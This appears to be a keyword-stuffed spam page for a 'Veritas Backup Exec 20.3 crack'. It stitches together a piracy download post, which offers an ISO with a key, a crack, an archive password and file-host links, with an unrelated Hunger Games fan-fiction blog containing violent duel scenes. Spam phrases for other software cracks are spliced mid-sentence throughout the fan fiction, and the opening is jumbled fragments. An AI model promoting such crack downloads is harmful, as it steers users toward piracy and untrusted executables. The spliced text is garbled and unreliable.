Oct 02 2012

veritas backup exec 20.3 crack  - Crack Key For U

The vulnerability is due to the presence of a default private key that Attackers can crack the default password and gain access to the. you can, try to maintain the employer-employee relation- fall, said Sherlock's chief exec- federal bailout will be like giving crack. In this provision "Det Norske Veritas" shall mean the Foundation Det Reference to RP for bonded patch repairs. 20.3 Certification requirements. veritas backup exec 20.3 crack  - Crack Key For U

watch the thematic video

Backup Virtual Machine (VM) with Veritas Backup Exec 20.3

: Veritas backup exec 20.3 crack - Crack Key For U

Veritas backup exec 20.3 crack - Crack Key For U
Android file transfer windows - Crack Key For U
POSTMAN ENTERPRISE CRACK - FREE ACTIVATORS
VyprVPN 4.1.0 Free Download with Crack
get}, HTTP-{get

You can Download Veritas Backup Exec Crack from our website for free

Veritas Backup Exec

Overview Table of Article

Veritas Backup Exec review

Veritas Backup Exec – I’ve been dreaming of introducing you to this program for a long time, probably it’s time! So, in front of you is a high-performance solution with client-server architecture that can create backups and restore data for servers, workstations and applications with maximum quality, accuracy and speed. You will be able to send backups, restore data, configure the storage, monitor Renee Passnow Free Download. The Administration Console is easy to run from the BackupExec server, you can also work with a remote computer. Among the advantages are convenient backup scheduling, full system recovery, comprehensive monitoring and visual mechanisms for performing daily tasks.

Click on the link below to download Veritas Backup Exec as always for free, the output will get an ISO image, mount, install and use, of course in the archive you will also find a key and a crack to register, all standard.

Backup Exec key Features:

  • protect your virtual and physical environment with a single solution;
  • simplifying backup, reducing cost and complexity with products designed for multiple endpoints;
  • quickly create instant replicas of virtual machines by tightly integrating with technologies such as Microsoft® Volume Shadow Copy Service (VSS) and VMware vStorage API for Data Protection (VADP) to reduce CPU, memory and I/O consumption on the virtual host;
  • backup on disks, tapes and in the cloud.

Also recommended to you Download CyberLink PowerDVD Ultra

Screenshots:

Password for archiv: kolompc.com

License: ShareWare

Download Veritas Backup Exec 21.3.1200.2255 – (3.2 Gb)

UsersDrive upload-4ever UploadEv

Источник: https://kolompc.com/veritas-backup-exec/

Welcome everyone to my ninth ever Hunger Games! In my last games, The 399th Annual Hunger Games, Anais Morrisa from District 1 and created by Pippycat was crowned victor. These Games have a special twist added to them as well, a very special twist that will make these my biggest, boldest, and bloodiest Games yet!

Introduction

This year the Hunger Games will be a Quell, a very special Quell at that. This year the Games will contain ninety-two tributes. Yes, ninety-two! Thirty-two of them will be Reaped from District's 0 through 14 and the Capitol, another thirty-two will be voted upon by citizens of the Capitol. These tributes will be tributes from the 327th, 398th, and 399th Hunger Games. The tributes with the most votes will be revived and and sent back into the Games to compete again. And the final twenty-eight will be tributes who competed in the 300th, 301st, 302nd, 325th, & 326th Games. However, unlike the tributes from the newer Games, these tributes will not be voted in. Instead, these tributes will be divided by District, placed into a large location that matches the District's import, and be forced to fight to the death until only two remain. These two tributes will then be inserted into the Games along with the new tributes and the voted in tributes, bringing the total amount of tributes competing to ninety-two.

Rules

1: There will be ninety-two Tributes, 32 tributes who competed in my 327th, 398th, and 399th Games, 28 tributes who competed in my 300th, 301st, 302nd, 325th, & 326th Games, and finally, there will be 32 new tributes

2: You may submit up two new Tributes

3: Because of the sheer amount of tributes, sponsoring will not be in these Games, at least not at first. Once the numbers begin to dwindle then sponsoring will be reinstated

4: I will write Reapings, Group Training, and of course the actual Games

5: I will not accept any Tributes that have been in my previous Games (that's what the All-Stars' are for)

6: Reservations last exactly 48 hours (this may be extended in certain cases)

7: The Capitol is a Career district in my Games

8: Because of the size of these Games, I anticipate it will take a long time for them to finish. If you're not comfortable joining a Games that will last many months than I'd advise you refrain from joining.

9: Tribute Form: (for new tributes)

Name:

District:

Gender:

Age:

Personality:

Back-story:

Height:

Appearance:

Weapon(s):

Strengths:

Weaknesses:

Fear(s):

Bloodbath Strategy:

Alliance: (can be filled out later)

Training Strategy: (how they will behave in training)

Choosing All-Stars

1: There will be three factors that will decide who will compete again.  First of which is votes.  I'll explain how it works below. 

Each user can vote for one tribute per slot, and de-vote one tribute per slot. (Example: You can only vote for 1 D1 male and de-vote one D1 male) A devote means that you DO NOT want that tribute, and one vote will be taken away from them instead. (Example: Vote: Edmund Everton, De-Vote: Veritas backup exec 20.3 crack - Crack Key For U Redge Edmund would be at one, Marcio at -1)

Here is the vote template: (Just copy and paste this in the comments and bold which tribute you are voting for, and italicize the tribute you are de-voting.)

The three Games are.

http://thehungergames.wikia.com/wiki/User_blog:LightStone123/327th_Annual_Hunger_Games_(All-Stars)

http://thehungergames.wikia.com/wiki/User_blog:LightStone123/398th_Annual_Hunger_Games

http://thehungergames.wikia.com/wiki/User_blog:LightStone123/399th_Annual_Hunger_Games

Start copy and pasting HERE:


District 0 Male: Solar Energy (398) & Fenrir Amarth (399)

District 0 Female: Aelia Freedome (398) & Bailey Snowbelle (399)

District 1 Male: Dragon Lord (327), Trevor Gold (398), & Jake Locketback (399)

District 1 Female: Glique Dumofitz (327), Astrid Bellia (327), & Trinity Mace (398)

District 2 Male: Julius Paris (327), Hatch Scright (327), Luigi Wilkins (398), & Hammer Time (399)

District 2 Female: Jerica Straddler (327), Ella Massey (327), Avia Veritas backup exec 20.3 crack - Crack Key For U (398), & Carmine Morrisa (399)

District 3 Male: Wario Wade (327), Courage Blitz (327), Shuppet Jorravaskr (398), Aspen Bolts (399)

District 3 Female: Annabeth March (327), Sombra Celesta (398), & Iris Pixel (399)

District 4 Male: Percy Grace (327), Ryan Marine (327), Nikki Heart (398), & Kaye Ocelote (399)

District 4 Female: Zia Grace (327) Swatty Lakeside (327), Scarlet Avalon (398), & Mizu Fall (399)

District 5 Male: Woody Chopper (327), Kodai Hitogoroshi (327), Johnathan Mikeal (398), & Clark Stevens (399)

District 5 Female: Augusta Winters (327), Trick Treat (327), Lucinda Kidd (398), & Missy Turner (399)

District 6 Male: Blade Spectrus (327), Train McBridge (327), & Julio Fall (399)

District 6 Female: Alissa Metal Beam (327), Mimic Slaughter (327) A Amore Madness (398), & Rosalie Sonnet (399)

District 7 Male: Hybrid Three (327), Shade Spectrus (327), Nick Maclachlan (398), & Henry Polyester (399)

District 7 Female: Marcia Callamezzo (327), Willow Firethorn (327), Fiora Waltz (398), & Arbor Alpine (399)

District 8 Male: Rufus Silks (327), Dome Citadel (327), Banette Tsukomogami (398), & Colin Bisset (399)

District 8 Female: Evelyn Dinstra (327), Cashmere Prada (327), Aisha Hakeem (398), & Kim Carett (399)

District 9 Male: Hunter Davila (327), Jake Price (327), Lyman Milton (398), & Jac Price (399)

District 9 Female: Alicia Haze (327), Varina Tapora (327), Juline Cenia (398), & Azalea Finch (399)

District 10 Male: Twix Cinders (327), Driver Genius Pro 21.0.0.121 Crack + License Key Free Download 2021 Rockford (327), Stephen Star (398), & Billy McGranger (399)

District 10 Female: Bella Mustang (327), Vivan Incomstanti (327), Cleopatra Royalty (398), & Fawn Talons (399)

District 11 Male: Gloom Ivy (327), Darker Horrfi (327), Crimson Typhoon (398), & Bellamy Blake (399)

District 11 Female: Daisy Lilac (327), Mondi Bakerman (327), Raven Night (398), & Octavia Blake (399)

District 12 Male: Exolian Dynamite (327), Drago Fire (398), & Ganta Alomo (399)

District 12 Female: Rio Flock (327), Amaryllis Silvermoon (327), Celica Rotas (398) & Misty Honeysuckle (399)

District 13 Male: Kingsley Orion (327), Ice Hunts (327), Radiant Tayz (325), & Luxio Sertralium (399)

District 13 Female: Celia Myer (327), Piper Quinn (327), Zoey Proasheck (398) & Alexandrite Bohamia (399)

District 14 Male: Odin Amarth (398) & Luxray Meganium (399)

District 14 Female: Angel Orthodox (398) & Amaya Lovelace (399)

Capitol Male: Dusk Olive (327), Ramon Constancy (327), Furcifer Soror (398), & Iggy Coupe (399)

Capitol Female: Dawn Olive (327), Aemillia Wonder (398), Flame Vapore (399)

Stop copy and pasting HERE:

2: The other factors in deciding who will be selected is  1: My personal preference. Basically, If I like the tribute it has a better chance of getting in. and 2: Detail. If a tribute wasn't very detailed or interesting the first time it competed, it likely won't get in this time.

3. After all the votes and de-votes are counted (I will allow a week for voting), I will pick the tributes using the other categories as well.

3. Please do not pick tributes because you are friends with their creator, etc. Pick the tribute you find most interesting due to backstory, you liked reading about them etc. It would probably be a good idea to read my past Games if you haven't already. Oh, and of course, you can vote for your own tributes.

4. In case the tributes have creators who are no longer active, I will assign people to mentor those tributes. So don't not vote for a tribute because their creator isn't active.

5: Don't worry. I'll veritas backup exec 20.3 crack - Crack Key For U sure that the amount of tributes people have is even. Example, one person won't have like six All-Stars.

​ All-Stars Part 2

The other twenty-eight All-Stars will not be voted upon. No, they will have to earn their second chance at the Games through an all-out battle to the death. 

These duels will be between every tribute from my 300th through 326th Games. Yes, every tribute except for Victors and the tributes who were voted into the 327th Games. They will be exempt from this death duel and instead be included in the voting process. 

All the other tributes however, will be separated by District and inserted into the Death Duels. The duels themselves will take place in a enclosed environment, either outside or inside, and weapons may be provided. There will be no possibility of escape. The only way the duels end Is when only two tributes remain living. All others must be dead. 

In short, the duels will be like a miniature bloodbath where everyone must fight and kill until there is only two tributes left standing. At this point, the Duel ends and the two winners will join the Reaped tributes and the voted in All-Stars in the Games.

The five Games that these tributes are from will be listed below.

http://thehungergames.wikia.com/wiki/User_blog:LightStone123/The_300th_Annual_Hunger_Games:

http://thehungergames.wikia.com/wiki/User_blog:LightStone123/301st_Annual_Hunger_Games

http://thehungergames.wikia.com/wiki/User_blog:LightStone123/302nd_Annual_Hunger_Games

http://thehungergames.wikia.com/wiki/User_blog:LightStone123/325th_Annual_Hunger_Games

http://thehungergames.wikia.com/wiki/User_blog:LightStone123/326th_Annual_Hunger_Games


The tributes who will compete in each duel are.

District 1 Duel: Elvis Alexander (300), Cole Harrison (325), Karma Blood (325), Warwickite Jewelly (326), Diamond Coman (301), Raven Armor (302), Skylar Windbreeze (325), Artemis Grace (325), & Kate Willis (326)

District 2 Duel: Johnny Clarke (300), Damian Weatherby (301), Drewsiff Bloodwonky (302), Yuki Kokyu (325), Jeffrey Killheart (326), Bethany Clarke (300), Pansy Costello (301), Onyx Eboni (302), Chloe Black (325), & Teresa Silver (325

District 3 Duel: Noah Everest (300), Elecc Commission (325), Chip Parks (325), Rebel Groots (326), Di Thorn (300), Bethunia Underium (301), Syren Song (302), Elecctronny Watson (325), & Vision Faith (325)

District 4 Duel: Flick Rivers (300th), Cody Freshwater (301st), Trident Bekke (302nd), Giller McFish (325th), Wayne Defleckt (325th), Kaylay Netter (300) Wari Oceani (301), Nymph Mere (325), Fressa Saltie (325), & Seafoam Majesty (326)

District 5 Duel: Trenton Powers (300), Watt Powers (301), Tameo Arghus (302), Sebastian Hive (325), Philo Ventus (326), Allie Costigan (300), Swift Twirpshkin (301), Allana Darkbloom (325), & Bonnie Cougar (326)

District 6 Duel: Cosmo Fyngelli (300), Xavier Woods (301), Illegal Drugs (302), Zak Slaughter (325), Wolbert Toonico (325), Belladonna Saware (300), Luna Fern (301) Bluffy Silvestein (302), Eleith Lightstorm (325), & Blondie Genesis (326)

District 7 Duel: Ransom Overman (301), Wocky Oak (302), & Frade Spectrus (326), May-Ann Hunter (300), Nastya Gushkin (301), Maple Leavestruck (325), Chumps Harvaria (325), & Voolia Kelopi (326)

District 8 Duel: Nick Kobarg (300), Josef Wilder (301), Jax Griffin (325), Tot Tenham (325), Yuri Collins (326), Coco Joansi (300), Freya Prada (302), Galina Von Dover (325), Catalina Tweed (325), & Odessa Garnetstone (326)

District 9 Duel: Eli Dawn (300), Mark Haulk (301), Hunther Hayes (302), Folly Rover (325), Tito Granso (326), Plasma Perimen (300), Perrie Grain (301), Layla Twozone (325), & Vera Luchabra (326)

District 10 Duel: Morolith Dmitry (300), Bronco Bagwell (301), Alec Cohen (325), Kwarts Diodin (325), Alex Lexys (326), Gracie King (300), Seeker Amaryllis (301), Ellis Blackberry (302), Alecia Cohen (325), & Cassie Lexys (326)

District 11 Duel: Wess Cornstob (300), Shimdt Raspberry (302), Trent Korey (325), Seez Croppley (325), Zippy Oakster (326), Flow’r Raspberry (301), Rasp Southern (302), Flora Sapsling (325), Eva Destiny (325) & Flippy Twinmind (326)

District 12 Duel: Gogh Lizta (300), Knight Castle (302), Jack Cayman (325), Julian (325), Regina Victorious (301), Mina Ebony (302), Salem Calla (325), Thalia Combe (325) & Steammie Pic (326)

District 13 Duel: Aeron Ashkyn (302), Harley Swoop (325), Douglas Biles (326), Saidy Dauntless (301), Kiara Mitchell (302), Violetta Nobel (325), & Jenessa Whitten (326)

Capitol Duel: Avian Monte (302), Josool Wiranda (325), Dexter Malon (325), Olympic Oblado (326), Shervert Wonkalandia (301), Flawra Moonshadow (325), Amelia Puregold (325), & Isolde Blair (326)

Tributes

District Type Gender Name Age Height Weapon User
Capitol New Male Kaneki Urashi 15 5'9 Double Glaive WongPongSoup
Capitol Voted Male Ramon Constancy 18 6'2 Bow & Arrows VDA1999
Capitol Duel Male Josool Wiranda 14 5'1 Bow, Throwing Knives SuperTomato
Capitol New Female Mahogany Vesta 17 5'8 Throwing Knives TheFireJay
Capitol Voted Female Flame Vapore 16 5'11 Axe, Dagger Mistfire333
Capitol Duel Male Olympic Oblado 18 5'7 Machete SuperTomato
0 New Male Todd Evans 18 6'3 Brass Knuckles, Knife Glove YourFavoriteSalmon
0 Voted Male Solar Energy 15 5'6 Spear TheFireJay
0 New Female Rosalina Cosmic 14 5'2 Throwing Knives TheFireJay
0 Voted Female Aelia Freedome 17 5'7 Spear Mistymolla
1 New Male Cullinan Beryll 18 6'3 Iron Shoes Nlby001
1 Voted Male Jake Locketback 18 5'10 Spear, Bow MarinaTheTenkaiKnight
1 Duel Male Elvis Alexander 18 6'2 Sword, Spear SuperTomato
1 New Female Anissa Fallows 17 6'2 Bow, Throwing Knives Mistymolla
1 Voted Female Trinity Mace 17 5'2 Knife, Mace YourFavoriteSalmon
1 Duel Male Cole Harrison 18 6'3 Mace, Spear Kaegan-is-a-tribute
2 New Male Rodeo Baldios 16 6'5 Hand-to-Hand combat SerpentKing999
2 Voted Male Luigi Wilkins 17 6'1 Sword, Throwing Knives MyWorld
2 Duel Female Pansy Costella 18 5'7 Scimitar AxedFox
2 New Female Ena Shea 17 5'9 Ice pick, Bow Aerialchinook
2 Voted Female Carmine Morrisa 16 5'9 Warhammer, Mace Pippycat
2 Duel Female Chloe Black 16 5'7 Sword, Throwing Knives CatoET
3 New Male Caspian Mahoney 18 6'2 Sword, Chakram CToaURN
3 Voted Male Courage Blitz 14 5'7 Sword Jabberjay78
3 Duel Male Noah Everest 13 5'4 Throwing Axes Theman77
3 New Female Ziya Ashton 15 5'6 Throwing Knives, Hammer Aerialchinook
3 Voted Female Annabeth March 16 5'4 Bow, Sickle FrostyFire
3 Duel Male Chip Parks 15 5'5 Mines, Knives MissRandomStuff
4 New Male Dylan Murrow 17 5'10 Trident, Throwing Knives Sambaroses
4 Voted Male Ryan Marine 17 5'10 Trident, Knives TheFireJay
4 Duel Male Trident Bekke 15 5'10 Trident, Net Junior II
4 New Female Sheol Argos 16 6'0 Scissors SerpentKing999
4 Voted Female Mizu Fall 16 5'4 Teeth, Trident Mistymolla
4 Duel Female Fressa Saltie 17 5'11 Trident, Throwing Knives FrostyFire
5 New Male Seth Rollins 18 6'0 Axe, Longsword Misfire333
5 Duel Male Watt Powers 14 5'4 Blowgun, Snares Attackcobra
5 Voted Male Johnathan Mikeal 18 6'5 Sword, Spear YourFavoriteSalmon
5 New Female Ashley Curtis 14 5'4 Bow, Dagger MyWorld
5 Duel Male Sebastian Hive 18 6'1 Butcher Knife Nommehzombies
5 Voted Female Trick Treat 17 5'9 Anything Hybrid Shadow
6 New Male Stario Lucaren 13 5'4 Throwing Knives, Dagger MyWorld
6 Duel Male Wolbert Toonico 18 6'0 Sword Supertomato
6 Voted Male Blade Spectrus 14 5'4 Spear, Sword tehblakdeath
6 New Female Kennedy Marks 18 5'8 Dagger Bacon Canadian
6 Duel Female Luna Fern 14 5'4 Axe Mistymolla
6 Voted Female Amore Madness 16 5'6 Spear, Crossbow Mistfire333
7 New Male Axel Alex 17 6'2 Throwing Axe, Axe Striker12345
7 Duel Male Wocky Oak 16 5'5 Axe, Throwing Knives FrostyFire
7 Voted Male Shade Spectrus 16 6'2 Dagger, Crossbow Mistfire333
7 New Female Amethystia Thall 15 5'3 Mace, Throwing Axe MarinaTheTenkaiKnight
7 Duel Male Frade Spectrus 14 5'4 Dagger, Crossbow Mistfire333
7 Voted Female Arbor Alpine 17 5'5 Axe Hybrid Shadow
8 New Male Jet Flack 15 6'1 Sword, Crossbow Striker12345
8 Duel Male Josef Wilder 18 5'11 Crossbow, Knives Attackcobra
8 Voted Male Banette Tsukomogami 15 5'5 Needles, Knives Mistfire333
8 New Female

Camiren Paisley-Idylwyld

17 5'7 Sword, Dagger Summer Bee 13
8 Duel Female Freya Prada 13 5'6 Crossbow Mistymolla
8 Voted Female Aisha Hakeem 15 5'6 Throwing Knives, Axes Aerialchinook
9 New Male Harvest Cropper 14 5'7 Sickle, Scythe Wolfgirl23
9 Duel Female Plasma Perimen 16 5'11 Machete Dedejacob
9 Voted Male Jac Price 16 5'9 Sword TheFireJay
9 New Female Amira Blodwen 14 5'6 Bow, Scythe Sambaroses
9 Duel Female Vera Luchabra 18 6'2 Axe, Club Andy1854
9 Voted Female Azalea Finch 16 5'5 Scythe, Bow Aerialchinook
10 New Male Marlon Lander 12 5'3 Scythe, Bow Yoonie
10 Duel Female Ellis Blackberry 16 5'7 Throwing Knives, Spear EmpressOreo
10 Voted Male Billy McGranger 14 5'3 Whip Wolfgirl23
10 New Female Madeva McGranger 18 6'4 Whip, Knives Wolfgirl23
10 Duel Female Cassie Lexys 14 5'4 Crossbow, Blowgun MissRandomStuff
10 Voted Female Fawn Talons 16 5'9 Scythe, Throwing Knives Sambaroses
11 New Male Caliban Rweed 17 6'3 Sword, Dagger tehblakdeath
11 Duel Male Wess Cornstob 17 6'1 Sword, Throwing Axe FrostyFire
11 Voted Male Crimson Typhoon 14 5'6 Bow, Sword AwesomeAidan
11 New Female Annabelle Harret 14 5'5 Bow, Throwing Knives YourFavoriteSalmon
11 Duel Male Trent Korey 18 6'0 Spear, Trident MissRandomStuff
11 Voted Female Daisy Lilac 16 5'7 Machete, Dagger Aerialchinook
12 New Male Falk Avian 13 5'7 Bow & Arrows Yoonie
12 Duel Female Thalia Combe 16 5'7 Bow, Throwing Knives Nommehzombies
12 Voted Male Ganta Alomo 15 5'8 Needles WongPongSoup
12 New Female Curricular Lunes 17 5'7 Cleaver, Knife Blissfully Mine
12 Duel Female Salem Calla 15 4'11 Poison, Throwing Knives Foxface D5
12 Voted Female Misty Honeysuckle 14 5'1 Sword, Blowgun Sambaroses
13 New Male Julian Veritas 15 5'11 Machete, Bow Pippycat
13 Duel Male Douglas Biles 15 5'7 Wire, Spear Aerialchinook
13 Voted Male Radiant Tayz 16 5'11 Sword, Crossbow tehblakdeath
13 New Female Adreanna Danish 17 5'11 Hand-to-Hand combat Blissfully Mine
13 Duel Female Jenessa Whitten 15 5'9 Throwing Knives Socks6363
13 Voted Female Zoey Proasheck 15 5'8 Axe, Katana tehblakdeath
14 New Male Dean Ambrose 18 6'4 Knife, Axe Mistfire333
14 Voted Male Luxray Meganium 18 6'5 Morning Star tehblakdeath
14 New Female Amica Belle 17 5'8 Knife, Mace Mistymolla
14 Voted Female Amaya Lovelace 16 5'2 Knife Mistymolla

Alliances

(Note: These alliances are not final and are subject to change.)

Careers: Todd Evans (0), Cullinan Beryll (1), Jake Locketback (1), Elvis Alexander (1), Cole Harrison (1), Trinity Mace (1), Luigi Wilkins (2), Chloe Black (2), Pansy Costella (2), Dylan Murrow (4), Trident Bekke (4), Sheol Argos (4), Seth Rollins (5), Trent Korey (11), Luxray Meganium (14), Dean Ambrose (14), & Olympic Oblado (C)

Splinter Careers: Carmine Morrisa (2), Ena Shea (2), Zoey Proasheck (13), & Josool Wiranda (C)

Anti-Careers: Blade Spectrus (6), Wolbert Toonico (6), Frade Spectrus (7), Shade Spectrus (7), Crimson Typhoon (11), Daisy Lilac (11), Misty Honeysuckle (12), & Radiant Tayz (13)

Aelia's Alliance: Aelia Freedome (0), Anissa Fallows (1), Amore Madness (6), Luna Fern (6), Aisha Hakeem (8), Freya Prada (8), Ellis Blackberry (10), Annabelle Harret (11), Ganta Alomo (12), Falk Avian (12), Salem Calla (12), Amaya Lovelace (14), Amica Belle (14), & Mahogany Vesta (C)

700th Comment Alliance: Sebastian Hive (5), Watt Powers (5), & Thalia Combe (12)

District 3 & 12 Alliance: Rosalina Cosmic (0), Caspian Mahoney (3) & Curricular Lunes (12)

District 5, 8, 9, & 13 Alliance: Johnathan Mikeal (5), Banette Tsukomogami (8), Harvest Cropper (9), & Julian Veritas (13)

District 5, 9, & 10 Alliance: Amira Blodwen (9), Marlon Lander (10), & Ashley Curtis (5)

District 6, 7, & 8 Alliance: Amethystia Thall (7), Kennedy Marks (6), Camiren Paisley (8), Douglas Biles (13), & Jenessa Whitten (13)

District 7 & 8 Alliance: Frade Spectrus (7) & Josef Wilder (8)

District 9 Alliance: Jac Price (9) & Azalea Finch (9)

District 9 Alliance: Vera Luchabra (9) & Plasma Perimen (9)

District 10 Alliance: Billy McGranger (10), Madeva McGranger (10), & Fawn Talons (10)

Loners: Solar Energy (0), Rodeo Baldios (2), Noah Everest (3), Chip Parks (3), Courage Blitz (3), Ziya Ashton (3), Mizu Fall (4), Axel Alex (7), Wocky Oak (7), Jet Flack (8), Cassie Lexys (10), Wess Cornstob (11), Caliban Rweed (11), Adreanna Danish (13), Kaneki Urashi (C), Ramon Constancy (C), & Flame Vapore (C)

Items Antidote (cures poison): $150

Anti-Infection: $125

Awl: $50

Alcohol: $75

Axe: $150

Baton: $100

Battleaxe $175

Blanket: $50

Blowgun: $125

Bow: $150

Bread: $50

Burn Cream: $125

Canteen: $75

Camouflage Paints: $100

Chakram: $175

Chlorine: $75

Cookies: $25

Crossbow: $175

Crackers: $15

Dagger: $100

Darts (12): $25

Dried Meat: $75

Dried Fruit: $50

Flail: $125

Flares x3: $125

Flashlight: $100

Hammer: $125

Instant Relief: $400

Iodine: $100

Knife: $50

Knife Glove: $100

Mace: $150

Mace (Chained): $175

Machete: $125

Matches: $75

Morning Star: $175

Gasoline $100

Hatchet: $150

Needles (3): $125

Net: $75

Net Trap: $125

Night-Vision Glasses: $150

Piece of Plastic: $15

Painkillers: $75

Poison: $100

Quiver of Arrows (12): $50

Raft: $125

Rocks: $15

Rope: $25

Scythe: $150

Shield: $125

Shield (Spiked): $200

Shurikens (5): $125

Sickle: $125

Sleeping Bag: $50

Sleep Syrup: $125

Slingshot: $75

Soup: $75

Spear: $125

Spike Trap: $250

Spile: $50

Sword: $150

Throwing Axes (3): $200

Throwing Knives (3): $200

Trident: $225

Water: $100

Whip: $75

Wire: $75

Wooden Club: $100

Wooden Club (Spiked): $150

Death Duels

District 1 Death Duel

Elvis Alexander (300th Games)

I'm in a very small room, there's absolutely nothing here but the tiled floors and ceiling that surround me. A metallic platform rests under my booted feet, ready to rise up and bring me into the Duel Arena.

Can't believe I'm even in this situation.

I've already been told what happened, how I got back into this place. How I need to kill every damn person who will join me in that small arena. Nine of us will enter but only two will leave. Only two will be in the 400th Hunger Games. They've given me some info cards Massive X Serial key read to get myself adjusted to my opponents. The cards told me their names and how they performed in the Games but it's very light on the details. Still, I'm ready. I've prepared my entire life for the Games and I would have won my Games, the 300th, if it weren't for those treacherous traitors Di and Flick, jumping me from behind. My hands are already clenching into fists at my side at the mere thought of them.

The Games are meant to be played with honor. Those two knew nothing of honor. They were filthy cretins who lied, cheated, and stole their way through the Games. I wish they were in this Duel. Then I would wring their pathetic little necks.

"Prepare for Duel commencing!"

A robotic female voice comes through a speaker into my room. I shake my head vigorously, my blonde ponytail bouncing behind me. "Bring it on, baby!" I scream to the sky, ready for some violence. My body is ready.

"Platforms will now rise. Please stay in the center. Thank you."

I hear gears churning under my feet as the metal platform begins to rise. I'm excited, giddy almost. I don't think I've felt this level of anticipation since the first time I was brought into the arena. Apparently that was over a hundred years ago. Man, time flies when you're dead. The platform rises through the ceiling and then I'm in a dark tunnel. Very much like the arena. "I'm ready!" I howl as a light appears above my head. Then I arrive in the arena.

It's dark and after that bright light I can barely see anything, causing me to rub my eyes. It doesn't help but after a few seconds pass everything comes into focus. I'm in a cavern, of sorts. Dark musty rocks surround me, predictably smelling like soil and dirt. But that's not the attention grabbing. That's the giant diamonds.

Massive diamonds surround me, shining in the darkness. I don't see any outside light source for them to be reflecting, rather, it seems that they are the light source. "Coolio man!" I whistle as I stare at the diamonds, impressed. Plain white diamonds are the most common but there's others too, red diamonds, blue, green, yellow, even purple. There's one of just about every color.

I get so absorbed in watching these diamonds sparkle with their innate light that I don't even think to look around for other tributes. Not that there's any around. The cavern is dark and my view is impeded by this coolio diamonds. I'm supposing that the others are on platforms similar to mine. Just waiting out there.

A full minute passes before I realize something is wrong. There's been no announcement. No signal that the Duel has started. Nothing. What gives?

I bring my gaze back across the diamonds and cavern. I see nothing out of place. "Where's my signal, man?" I mutter aloud just before looking up. I don't know how I missed it before. A giant holographic screen shining on the roof of the cavern. Picture headshots of tributes are shown, along with their Games number. Nine District 1 tributes from five different Hunger Games stated down at me, my own face one of them. These are the losers, the dead. The tributes who died in their Games and weren't voted in to compete in the 327th. The ones nobody wanted to see compete again. My District partner from the 300th Games, Astrid Bellia, isn't among us. I'm pissed off I'm not with her and instead stuck here with the dregs. I am far above them!

Ding!

A quiet chiming noise echoes throughout the cavern, vibrating towards my ears. I'm just beginning to wonder what it means when one of the faces, the one of the girl from the 301st Hunger Games, blinks off. The portrait goes dark and red words scroll across reading "Deceased".

"Oh, hell no!"

I realize two things at once. One: That holographic screen is used to track whose still alive and fighting. And Two: The fact that someone has just died means that this Duel has already started. There is no announcement. The Duel just starts the moment you come into the arena.

I tighten my muscles and spring off of the platform. When my boot lands on the hard-packed dirt of the cavern, I have a brief fear that I'm wrong. That there will be landmines like in the Hunger Games. That I'll have my legs blown off. Luckily for me there's no explosion. My first guess was right, this Duel has already started.

I take off into the maze of diamonds, wondering how many of the others have already figured it out. At least one did. I mean, the girl didn't kill herself. I hope they haven't taken all of the weapons yet.

I've gone about ten feet forward when I skirt around a particularly large green diamond and come face to face with fs19 update cracked - Free Activators tribute. The girl shrieks in alarm and jumps back. I make note of her long brunette hair with avast internet security activation code - Crack Key For U highlights. It's one of the girls from the 325th Games. Skylar.

She throws her arms up for protection and I resist barking out laughter. What kind of District 1 tribute is she? She's an embarrassment to us all! I'll have no problem with fighting her. Too late the girl thinks to run. She's turned but my arms wrap around her and heave backwards. I don't have any weapons but I don't need any for this fight.

Skylar shouts for mercy as I grip my hands around her neck and slam her into the side of a diamond. She for silent immediately but I smash her head into the hard crystal several more times, just to make sure. After the fifth time her skull smacks into the diamond, I let go. Her neck hangs at an odd angle as she slips to the cold ground, leaving a long streak of blood across the beautiful diamond.

I spit and then crack my knuckles as another chime echoes through the cavern and Skylar's face dims. This should be fun.

Cole Harrison (325th Games)

Already two tributes have died. One of them being Skylar, a girl from my Games. I'm a bit torn seeing her dead. She was a terrible fighter, useless at almost everything. She was the first death of our Games after all. But she was also easy on the eyes. I'll miss her, if just for that.

I keep my ears open for any more chimes as I weave through the diamonds, in search of the weapons we were promised. No more chimes come as I reach what appears to be the edge diamond field. A large clearing rests in the center of all the diamonds that form a large circle around it. Crates full of weapons sit in an organized pattern, divided by weapon type. There's a crate full of swords, one with laces, axes, and spears. Just about every weapon I'd need. Great.

My eyes focused on a black handled spear, I step out into the clearing. Only then do I see the boy as he rises from the ground, a crimson liquid coating his hands and knees. Karma Blood. A boy from ny Games and a real freak at that. He loved to look at blood, collected it even. If that wasn't reason enough to hate him, there's also the fact that he betrayed me. "Where'd you get the blood, Karma?" I ask, stopping my progress. He lets out a low, sinister laugh and gestures at his feet.

"I found a pretty little donor!" He calls merrily and I see the girl. Blonde hair, green eyes. She was the first death of this Duel, Diamond Coman.

"You're a sick dude. You know that?" Diamond's throat had been torn open, revealing the bones and muscles inside. I can see the skin and blood under Karma's fingernails. No reason to wonder how it happened. He didn't even use a knife.

"Perhaps. But we all have our vices, don't we, Cole?" A smile spreads along his elongated face as he takes a step towards me. I spot the shape running out from the diamond maze and smile back.

"Yeah. Wonder what Warwickite's vices are?"

I take joy in the look of discomfort that crosses Karma's face right before Wariwickite blows into his back. The two boys fall to the ground, snarling as they wrestle for dominance. I don't know much about Warwickite. Just that he's from the 326th Games. But I trust he can handle Karma. I go sprinting for the spear I signalled out earlier but now I see that someone else has found the clearing. Raven Armor (302) slides a long katana out from the sword crate and grins wickedly at me.

"Game time, Cole!" My hands whip the spear out from its crate as I pass by, still sprinting at full speed. Raven sees me coming right for her and winds up swing at my head. Bad placement. I slide like a baseball player just as she unleashes the swing. She misses. I don't. My spear tip slices across her thigh and she drops to one uninjured leg, howling in pain. I spring back to my feet and thrust spear through the nape of her neck. Her howls of pain break off into bloody gurgles as the spear tip clogs her throat. She falls down, choking on her own blood as another chime goes off. "Oh yeah!" I give myself an imaginary high-five and turn to examine the clearing. Karma and Warwickite are still brawling, though it appears Karma is gaining the edge. I should go help--

"Think fast!"

I don't have time to think as a knife slices across the clearing, slashing into the tip of my spear and ripping it from my grasp. A girl with blonde haired tied back in a ponytail has appeared on the edge of clearing, a pair of throwing knives in hand. Where did she get those? Not from a crate, that's certain. But I don't have time to think about it. Kate (326) winds back her arm to throw another knife and I drop to the ground so hard that I swear I bruise my chest.

Not that I needed to. The knife doesn't even come for me. Instead, it cartwheels through the air and slams into the heart of an emerging Artemis, the second girl from my Games. She drops like a stone, dead on impact. Kate turns to me, priming the knife in her hand. "Crap."

